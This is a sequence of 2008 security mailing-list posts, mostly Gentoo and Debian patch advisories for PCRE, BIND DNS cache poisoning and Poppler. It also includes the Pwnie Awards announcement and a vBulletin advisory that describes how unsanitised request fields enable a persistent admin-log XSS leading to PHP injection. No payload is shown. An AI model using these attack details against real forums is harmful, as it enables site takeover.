specially crafted regular expression to an application making use of
the PCRE library, which could possibly lead to the execution of
arbitrary code or a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PCRE users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libpcre-7.7-r1"

All GLib users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.16.3-r1"

References
==========

  [ 1 ] CVE-2008-2371
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2371

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From alex at sotirov.net Tue Jul 8 09:40:14 2008
From: alex at sotirov.net (Alexander Sotirov)
Date: Tue, 8 Jul 2008 01:40:14 -0700
Subject: [Full-disclosure] Pwnie Awards 2008
Message-ID: <20080708084014.GA548@dsl093-068-005.sfo1.dsl.speakeasy.net>

The Pwnie Awards ceremony will return to the BlackHat USA 2008 conference in
Las Vegas. Last year's inaugural event was a lot of fun, and we hope it will
only get better. What should you expect from this year's ceremony? Exciting
new categories, an inspirational acceptance speech by the winner of the
Lamest Vendor Award and a special sing-along led by HD Moore!

The Pwnie Awards is an annual awards ceremony celebrating the achievements and
failures of security researchers and the wider security community. We're
currently accepting nominations in nine award categories, including two new
ones for this year:

 * Best Server-Side Bug
 * Best Client-Side Bug
 * Mass 0wnage
 * Most Innovative Research
 * Lamest Vendor Response
 * Most Overhyped Bug
 * Best Song
 * Most Epic FAIL (new for 2008)
 * Lifetime Achievement award for hackers over 30 (new for 2008)

The deadline for nominations is Monday, July 14. To submit a nomination, visit
the Pwnie Awards site at http://pwnie-awards.org/

For questions, please email info at pwnie-awards.org

Alexander Sotirov

From jessicasaulhope at googlemail.com Tue Jul 8 17:59:06 2008
From: jessicasaulhope at googlemail.com (Jessica Hope)
Date: Tue, 8 Jul 2008 17:59:06 +0100
Subject: [Full-disclosure] XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Message-ID: <44740eb60807080959g721452bdh4d326cf1cc1ab8fe@mail.gmail.com>

======================================================================
Advisory     : XSS in admin logs
Release Date : July 06th 2008
Application  : vBulletin
Version      : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform     : PHP
Vendor URL   : http://www.vbulletin.com/
Authors      : Jessica Hope (jessicasaulhope at googlemail.com),
               Friends who wish to remain anonymous.
=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the log viewing page of the admin control
panel. When a missing page is requested, a log is created in the admin
area, however the inputs to this log lack sanitisation. The script name
is taken from basename(PHP_SELF), while the action is taken from
_REQUEST['do']. Either one can be used for introducing XSS vectors.

To highlight the severity and underline the fact that this vulnerability
is exploitable:

You then need to send the admin to
adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
and the XSS will render.

The limits on the XSS:

  basename(PHP_SELF) is 50 characters max and no slashes
  _REQUEST['do'] is limited to 20 characters, but no character restriction.

The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited attack space can be obtained as
shown above.

As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This is due to the design of the vBulletin
hooks feature. As this particular XSS is persistent and will render in
all major browsers it is particularly dangerous.

=======================================================================

Solution:

Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3

Don't trust PHP_SELF and sanitise all data that is going to be displayed
to the user

=======================================================================

From fw at deneb.enyo.de Tue Jul 8 18:03:12 2008
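The flaw class described in the vBulletin advisory above (log fields taken from PHP_SELF and _REQUEST['do'], stored, then shown on an admin page) is sketched below next to a hardened form. This is an added example, not vBulletin's code and not part of the original post; the function names, the array standing in for the log table and the sample request values are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added illustration, NOT vBulletin code. Function names, the array-based
// "log entry" and the sample request values below are hypothetical.

/** Log entry built as the advisory describes: straight from request data. */
function make_log_entry(array $server, array $request): array
{
    return [
        // PHP_SELF includes any PATH_INFO the client appended after the
        // script name, so basename() can return client-chosen text.
        'script' => basename((string)($server['PHP_SELF'] ?? '')),
        'action' => (string)($request['do'] ?? ''),
    ];
}

/** Vulnerable view: stored values are concatenated into HTML as-is. */
function render_row_unsafe(array $entry): string
{
    return '<tr><td>' . $entry['script'] . '</td><td>' . $entry['action'] . '</td></tr>';
}

/** Encode a value for an HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened view: every stored field is encoded at output time. */
function render_row_safe(array $entry): string
{
    return '<tr><td>' . h($entry['script']) . '</td><td>' . h($entry['action']) . '</td></tr>';
}

/**
 * Hardened logging (defence in depth): take the script name from
 * SCRIPT_NAME, which carries no PATH_INFO, and allow-list the action.
 */
function make_log_entry_hardened(array $server, array $request): array
{
    $action = (string)($request['do'] ?? '');
    if (preg_match('/\A[A-Za-z0-9_]{1,20}\z/', $action) !== 1) {
        $action = '[rejected]';
    }
    return [
        'script' => basename((string)($server['SCRIPT_NAME'] ?? '')),
        'action' => $action,
    ];
}

// Constructed sample request: harmless markup stands in for hostile input
// and stays inside the limits the advisory lists (no slashes in the
// PHP_SELF part, at most 20 characters in "do").
$server = [
    'PHP_SELF'    => '/forum/missing.php/<u>marker',
    'SCRIPT_NAME' => '/forum/missing.php',
];
$request = ['do' => '<i>marker</i>'];

$raw      = make_log_entry($server, $request);
$hardened = make_log_entry_hardened($server, $request);

echo "unsafe view of raw entry:\n  ", render_row_unsafe($raw), "\n";
echo "safe view of raw entry:\n  ", render_row_safe($raw), "\n";
echo "safe view of hardened entry:\n  ", render_row_safe($hardened), "\n";
```

Encoding in the view also neutralises entries that were stored before any fix, which matters here because the advisory describes the XSS as persistent.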
From: fw at deneb.enyo.de (Florian Weimer)
Date: Tue, 08 Jul 2008 19:03:12 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning
Message-ID: <87vdzg48bz.fsf@mid.deneb.enyo.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1603-1                security at debian.org
http://www.debian.org/security/                           Florian Weimer
July 08, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : bind9
Vulnerability  : DNS cache poisoning
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1447
CERT advisory  : VU#800113

Dan Kaminsky discovered that properties inherent to the DNS protocol
lead to practical DNS cache poisoning attacks. Among other things,
successful attacks can lead to misdirected web traffic and email
rerouting.

This update changes Debian's BIND 9 packages to implement the
recommended countermeasure: UDP query source port randomization. This
change increases the size of the space from which an attacker has to
guess values in a backwards-compatible fashion and makes successful
attacks significantly more difficult.

Note that this security update changes BIND network behavior in a
fundamental way, and the following steps are recommended to ensure a
smooth upgrade.

1. Make sure that your network configuration is compatible with source
port randomization. If you guard your resolver with a stateless packet
filter, you may need to make sure that no non-DNS services listen on
the 1024--65535 UDP port range and open it at the packet filter. For
instance, packet filters based on etch's Linux 2.6.18 kernel only
support stateless filtering of IPv6 packets, and therefore pose this
additional difficulty. (If you use IPv4 with iptables and ESTABLISHED
rules, networking changes are likely not required.)

2. Install the BIND 9 upgrade, using "apt-get update" followed by
"apt-get install bind9". Verify that the named process has been
restarted and answers recursive queries. (If all queries result in
timeouts, this indicates that networking changes are necessary; see the
first step.)

3. Verify that source port randomization is active. Check that the
/var/log/daemon.log file does not contain messages of the following
form

  named[6106]: /etc/bind/named.conf.options:28: using specific
  query-source port suppresses port randomization and can be insecure.

right after the "listening on IPv6 interface" and "listening on IPv4
interface" messages logged by BIND upon startup. If these messages are
present, you should remove the indicated lines from the configuration,
or replace the port numbers contained within them with "*" sign (e.g.,
replace "port 53" with "port *").

For additional certainty, use tcpdump or some other network monitoring
tool to check for varying UDP source ports. If there is a NAT device
in front of your resolver, make sure that it does not defeat the effect
of source port randomization.

4. If you cannot activate source port randomization, consider
configuring BIND 9 to forward queries to a resolver which can, possibly
over a VPN such as OpenVPN to create the necessary trusted network link.
(Use BIND's forward-only mode in this case.)

Other caching resolvers distributed by Debian (PowerDNS, MaraDNS,
Unbound) already employ source port randomization, and no updated
packages are needed. BIND 9.5 up to and including version
1:9.5.0.dfsg-4 only implements a weak form of source port
randomization and needs to be updated as well. For information on
BIND 8, see DSA-1604-1, and for the status of the libc stub resolver,
see DSA-1605-1.

The updated bind9 packages contain changes originally scheduled for the
next stable point release, including the changed IP address of
L.ROOT-SERVERS.NET (Debian bug #449148).

For the stable distribution (etch), this problem has been fixed in
version 9.3.4-2etch3.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your bind9 package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.
393324 553b67ca638482db8e1586d231f03abe http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8 
http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802 http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0 
http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87 http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322 
http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299 sparc architecture (Sun SPARC/UltraSPARC) 
http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a These files will probably be moved into the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From fw at deneb.enyo.de Tue Jul 8 18:03:55 2008
From: fw at deneb.enyo.de (Florian Weimer)
Date: Tue, 08 Jul 2008 19:03:55 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1604-1] BIND 8 deprecation notice
Message-ID: <87r6a448as.fsf@mid.deneb.enyo.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1604-1               security at debian.org
http://www.debian.org/security/                           Florian Weimer
July 08, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : bind
Vulnerability  : DNS cache poisoning
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1447
CERT advisory  : VU#800113

Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.

The BIND 8 legacy code base could not be updated to include the recommended countermeasure (source port randomization, see DSA-1603-1 for details). There are two ways to deal with this situation:

1. Upgrade to BIND 9 (or another implementation with source port randomization). The documentation included with BIND 9 contains a migration guide.

2. Configure the BIND 8 resolver to forward queries to a BIND 9 resolver. Provided that the network between both resolvers is trusted, this protects the BIND 8 resolver from cache poisoning attacks (to the same degree that the BIND 9 resolver is protected).

This problem does not apply to BIND 8 when used exclusively as an authoritative DNS server. It is theoretically possible to safely use BIND 8 in this way, but updating to BIND 9 is strongly recommended. BIND 8 (that is, the bind package) will be removed from the etch distribution in a future point release.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From fw at deneb.enyo.de Tue Jul 8 18:05:29 2008
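The countermeasure named in DSA-1604-1, source port randomization, can be checked from the defender's side by looking at the UDP source ports a resolver uses for its outbound queries. The following Python example is added here and is not part of the advisory or of any Debian tooling; the function names, the thresholds and the sample port lists are constructed for illustration, and the transaction ID is assumed to be fully random.

```python
import math

TXID_BITS = 16  # the DNS transaction ID is a 16-bit header field


def assess_source_ports(ports, seq_step=16, min_span=16384):
    """Classify the UDP source ports of one resolver's outbound queries.

    ports: source ports in the order the queries were observed.
    Returns (verdict, guess_bits). guess_bits is a rough estimate of how many
    bits an off-path forger must guess (transaction ID plus source port),
    assuming the transaction ID itself is random.
    seq_step and min_span are thresholds chosen for this example.
    """
    if len(ports) < 2:
        raise ValueError("need at least two observed queries")
    if any(not 0 < p < 65536 for p in ports):
        raise ValueError("source port out of range")

    distinct = len(set(ports))
    if distinct == 1:
        # One static port: only the transaction ID protects the resolver.
        return "fixed", float(TXID_BITS)

    # Share of consecutive queries whose port moved forward by a small step
    # (modulo 65536, so a counter that wraps around is still recognised).
    deltas = [(b - a) % 65536 for a, b in zip(ports, ports[1:])]
    small_steps = sum(1 for d in deltas if 0 < d <= seq_step)
    if small_steps / len(deltas) >= 0.9:
        # Predictable counter: the next port can be inferred from the last.
        return "sequential", float(TXID_BITS)

    # Otherwise estimate the size of the port pool from the observed span.
    span = max(ports) - min(ports) + 1
    port_bits = math.log2(span)
    wide = span >= min_span and distinct > len(ports) // 2
    return ("randomized" if wide else "narrow"), TXID_BITS + port_bits


# Constructed observations (not taken from any real capture).
SAMPLES = {
    "fixed-port resolver": [53, 53, 53, 53, 53, 53],
    "incrementing ports": [32768 + i for i in range(10)],
    "small port pool": [1024, 1031, 1026, 1029, 1024, 1030, 1027, 1025, 1031, 1028],
    "randomized ports": [51234, 1893, 40211, 60002, 12877,
                         33019, 7450, 58123, 24680, 45001],
}


def report(samples):
    """Run the assessment over a mapping of resolver name -> observed ports."""
    return {name: assess_source_ports(ports) for name, ports in samples.items()}


if __name__ == "__main__":
    for name, (verdict, bits) in report(SAMPLES).items():
        print(f"{name:22s} {verdict:11s} ~{bits:.1f} bits to guess")
```

The port lists would normally come from a capture of the resolver's outbound queries taken on the upstream side; a larger sample gives a better estimate of the port pool.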
From: fw at deneb.enyo.de (Florian Weimer)
Date: Tue, 08 Jul 2008 19:05:29 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver
Message-ID: <87myks4886.fsf@mid.deneb.enyo.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1605-1               security at debian.org
http://www.debian.org/security/                           Florian Weimer
July 08, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : glibc
Vulnerability  : DNS cache poisoning
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1447
CERT advisory  : VU#800113

Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS spoofing and cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting.

At this time, it is not possible to implement the recommended countermeasures in the GNU libc stub resolver. The following workarounds are available:

1. Install a local BIND 9 resolver on the host, possibly in forward-only mode. BIND 9 will then use source port randomization when sending queries over the network. (Other caching resolvers can be used instead.)

2. Rely on IP address spoofing protection if available. Successful attacks must spoof the address of one of the resolvers, which may not be possible if the network is guarded properly against IP spoofing attacks (both from internal and external sources).

This DSA will be updated when patches for hardening the stub resolver are available.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From xploitable at gmail.com Tue Jul 8 19:46:29 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 8 Jul 2008 19:46:29 +0100
Subject: [Full-disclosure] Fwd: Comments on: Google powers up users' Gmail security arsenal
In-Reply-To: <1463f4c30807081131j19a0f12ci202738d1a5c8eca5@mail.gmail.com>
References: <1463f4c30807081131j19a0f12ci202738d1a5c8eca5@mail.gmail.com>
Message-ID: <4b6ee9310807081146u2a36febeye958f32da8f0741f@mail.gmail.com>

---------- Forwarded message ----------
From: newsgroup
Date: Tue, Jul 8, 2008 at 7:31 PM
Subject: Comments on: Google powers up users' Gmail security arsenal
To: n3td3v at googlegroups.com

by n3td3v July 8, 2008 11:23 AM

@ReVeLaTeD

Not all users with access to your Gmail account want to change the password, they want to read emails stealthily and that's all. Raising suspicion by letting the victim know you're there isn't something they want to do. If they kicked you out and changed the password they wouldn't be able to read your emails anymore, hence why they don't kick you out and change the password. You've got to remember why people break into web mail accounts in the first place, it's not to steal your account, it's to read emails and gather intelligence.

However, this feature is pointless in the sense of detecting if the government is snooping, as the government monitor your Gmail account in different ways. This feature is only going to detect low-level snooping by bedroom teens, criminals and stalkers. The end game is, the government are still reading your web emails and won't show up on this system.

It is a stupid feature in the sense it's giving gullible Gmail users a false sense of security in that, if they see no rogue IP addresses logging into their Gmail account, that they think no one is snooping and reading their emails, that isn't the case.

This system won't detect government snooping, the government simply send a national security letter to Google Mail and they are granted full access to backend visualisation stats, graphs and other neat features to watch everything that's going on with your Gmail account. You can probably bet this system purposely ignores known government addresses anyway in an agreement between the government and Google, so yeah completely misleading system this is.

All the best,

n3td3v

http://news.cnet.com/8601-13577_3-9985264.html?hhTest&communityId=2072&targetCommunityId=2072&messageId=753919#753919

From vorlon at gentoo.org Tue Jul 8 19:48:06 2008
From: vorlon at gentoo.org (Matthias Geerdsen)
Date: Tue, 08 Jul 2008 20:48:06 +0200
Subject: [Full-disclosure] [ GLSA 200807-04 ] Poppler: User-assisted execution of arbitrary code
Message-ID: <4873B666.1030207@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200807-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Poppler: User-assisted execution of arbitrary code
      Date: July 08, 2008
      Bugs: #229931
        ID: 200807-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Poppler is affected by a memory management issue, which could lead to the execution of arbitrary code.

Background
==========

Poppler is a cross-platform PDF rendering library originally based on Xpdf.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  app-text/poppler      < 0.6.3-r1                      >= 0.6.3-r1

Description
===========

Felipe Andres Manzano reported a memory management issue in the Page class constructor/destructor.

Impact
======

A remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All poppler users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/poppler-0.6.3-r1"

References
==========

  [ 1 ] CVE-2008-2950
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2950

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-04.xml

Concerns?
=========

